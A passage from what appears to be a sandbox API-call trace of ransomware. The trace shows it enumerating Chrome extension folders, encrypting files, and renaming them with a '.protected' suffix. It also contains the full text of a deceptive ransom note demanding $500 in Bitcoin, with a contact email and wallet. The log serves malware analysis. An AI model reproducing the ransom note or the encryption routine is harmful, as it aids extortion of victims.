Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\RESTORE_FILES.txt") returned 149 [0079.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0079.939] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.939] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0079.940] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.940] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0079.940] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.940] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0079.940] CloseHandle (hObject=0x15c) returned 1 [0079.941] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0079.941] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0079.942] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\RESTORE_FILES.txt") returned 141 [0079.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0079.942] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.942] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, 
lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0079.943] lstrlenA (lpString="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") returned 684 [0079.943] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0079.943] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.943] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0079.943] CloseHandle (hObject=0x158) returned 1 [0079.943] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="Windows") returned -1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="Program Files") returned -1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="Program Files (x86)") returned -1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="$Recycle.bin") returned 1 [0079.943] lstrcmpiW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="System Volume Information") returned -1 [0079.943] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap") returned 123 [0079.944] lstrcmpW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2=".") returned 1 
[0079.944] lstrcmpW (lpString1="felcaaldnbdncclmgdcncolpebgiejap", lpString2="..") returned 1 [0079.944] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\*") returned 125 [0079.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0079.948] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.948] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.948] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.948] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.948] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.948] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\.") returned 125 [0079.948] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.948] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.948] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.948] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.948] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.948] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.948] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.948] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\..") returned 126 [0079.948] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.948] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.948] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="Windows") returned -1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="Program Files") returned -1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="Program Files (x86)") returned -1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="$Recycle.bin") returned 1 [0079.948] lstrcmpiW (lpString1="1.1_0", lpString2="System Volume Information") returned -1 [0079.948] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0") returned 129 [0079.948] lstrcmpW (lpString1="1.1_0", lpString2=".") returned 1 [0079.948] lstrcmpW (lpString1="1.1_0", lpString2="..") returned 1 [0079.948] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\*") returned 131 [0079.948] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0079.958] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.958] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.958] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.958] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.958] lstrcmpiW (lpString1=".", lpString2="System 
Volume Information") returned -1 [0079.958] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\.") returned 131 [0079.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.958] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.959] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.959] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.959] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.959] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.959] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.959] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\..") returned 132 [0079.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.959] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="Windows") returned -1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files") returned -1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files (x86)") returned -1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="$Recycle.bin") returned 1 [0079.959] lstrcmpiW (lpString1="icon_128.png", lpString2="System Volume Information") returned -1 [0079.959] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0079.959] StrStrIW (lpFirst="icon_128.png", lpSrch=".protected") returned 0x0 [0079.959] lstrcmpW (lpString1="icon_128.png", lpString2="RESTORE_FILES.txt") returned -1 [0079.959] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.959] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.960] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0079.960] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0079.960] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0079.960] StrStrW (lpFirst="icon_128.png", lpSrch=".rar") returned 0x0 [0079.960] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png") returned 142 [0079.960] StrStrW (lpFirst="icon_128.png", lpSrch=".zip") returned 0x0 [0079.960] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xd47, lpOverlapped=0x0) returned 1 [0079.971] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff2b9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.971] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xd47, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xd47, lpOverlapped=0x0) returned 1 [0079.971] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.971] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.971] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.971] CloseHandle (hObject=0x160) returned 1 [0079.972] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.protected") returned 152 [0079.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.protected")) returned 1 [0079.975] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="Windows") returned -1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files") returned -1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files (x86)") returned -1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="$Recycle.bin") returned 1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="System Volume Information") returned -1 [0079.975] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0079.975] StrStrIW (lpFirst="icon_16.png", lpSrch=".protected") returned 0x0 [0079.975] lstrcmpW (lpString1="icon_16.png", lpString2="RESTORE_FILES.txt") returned -1 [0079.975] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.975] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0079.976] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0079.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0079.976] StrStrW (lpFirst="icon_16.png", lpSrch=".rar") returned 0x0 [0079.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0079.976] StrStrW (lpFirst="icon_16.png", lpSrch=".zip") returned 0x0 [0079.976] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x9d, lpOverlapped=0x0) returned 1 [0079.977] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffff63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.977] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x9d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x9d, lpOverlapped=0x0) returned 1 [0079.977] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.977] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.977] WriteFile (in: hFile=0x160, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.977] CloseHandle (hObject=0x160) returned 1 [0079.977] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.protected") returned 151 [0079.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.protected")) returned 1 [0079.978] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="Windows") returned -1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="Program Files") returned -1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="Program Files (x86)") returned -1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="$Recycle.bin") returned 1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="System Volume Information") returned -1 [0079.978] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0079.978] StrStrIW (lpFirst="main.html", lpSrch=".protected") returned 0x0 [0079.978] lstrcmpW (lpString1="main.html", lpString2="RESTORE_FILES.txt") returned -1 [0079.978] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.978] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0079.978] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0079.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 